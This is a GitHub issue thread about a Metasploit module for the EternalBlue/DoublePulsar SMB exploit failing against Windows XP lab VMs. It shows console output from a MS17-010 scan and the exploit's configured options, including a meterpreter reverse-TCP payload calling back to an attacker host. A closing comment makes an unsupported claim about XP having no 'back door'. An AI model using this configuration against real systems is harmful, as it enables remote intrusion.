search

Telefonica / Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
GNU Lesser General Public License v2.1
1.09k stars 520 forks source link

Does not work on WinXP #67

Closed BratE9000 closed 4 years ago

BratE9000 commented 6 years ago

I have tried everything in every open and closed issue. Has anyone gotten this to work on Windows XP?

I have tried three different versions of XP, all running in Virtual Box VM. Two loaded straight from DVD with Service Pack 2 only. One from Windows 7 XP Mode. I have tried two different attack platforms (both Kali). I get the same thing every time.

If you have gotten it to work, please tell me what your target platform was and any different settings you may have used.

Thanks much!

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > run

[+] 192.168.10.155:445    - Host is likely VULNERABLE to MS17-010!  (Windows 5.1)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
------- -----
msf auxiliary(smb_ms17_010) > use exploit/windows/smb/eternalblue_doublepulsar
msf exploit(eternalblue_doublepulsar) > show options

Module options (exploit/windows/smb/eternalblue_doublepulsar):

Name                Current Setting                                  Required  Description
DOUBLEPULSARPATH    /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Doublepulsar
ETERNALBLUEPATH     /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Eternalblue
PROCESSINJECT       explorer.exe                                     yes       Name of process to inject into (Change to lsass.exe for x64)
RHOST               192.168.10.155                                   yes       The target address
RPORT               445                                              yes       The SMB service port (TCP)
TARGETARCHITECTURE  x86                                              yes       Target Architecture (Accepted: x86, x64)
WINEPATH            /root/.wine/drive_c/                             yes       WINE drive_c path

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     192.168.10.190   yes       The listen address
LPORT     4444             yes       The listen port

Exploit target:

Id  Name
0   Windows XP (all services pack) (x86) (x64)
------ -------
msf exploit(eternalblue_doublepulsar) > exploit
[*] Started reverse TCP handler on 192.168.10.190:4444 
[*] 192.168.10.155:445 - Generating Eternalblue XML data
[*] 192.168.10.155:445 - Generating Doublepulsar XML data
[*] 192.168.10.155:445 - Generating payload DLL for Doublepulsar
[*] 192.168.10.155:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.10.155:445 - Launching Eternalblue...
[-] Error getting output back from Core; aborting...
[-] 192.168.10.155:445 - Are you sure it's vulnerable?
[*] 192.168.10.155:445 - Launching Doublepulsar...
[-] 192.168.10.155:445 - Oops, something was wrong!
[*] Exploit completed, but no session was created.
---- ----
BratE9000 commented 6 years ago

Vista ultimate x64 from factory disk also doesn’t work. Server 2008 90-day trial worked for me first time, so I’m pretty sure my attack platform and settings are all in order.

BurntRouter commented 6 years ago

XP and Vista don't have the back door...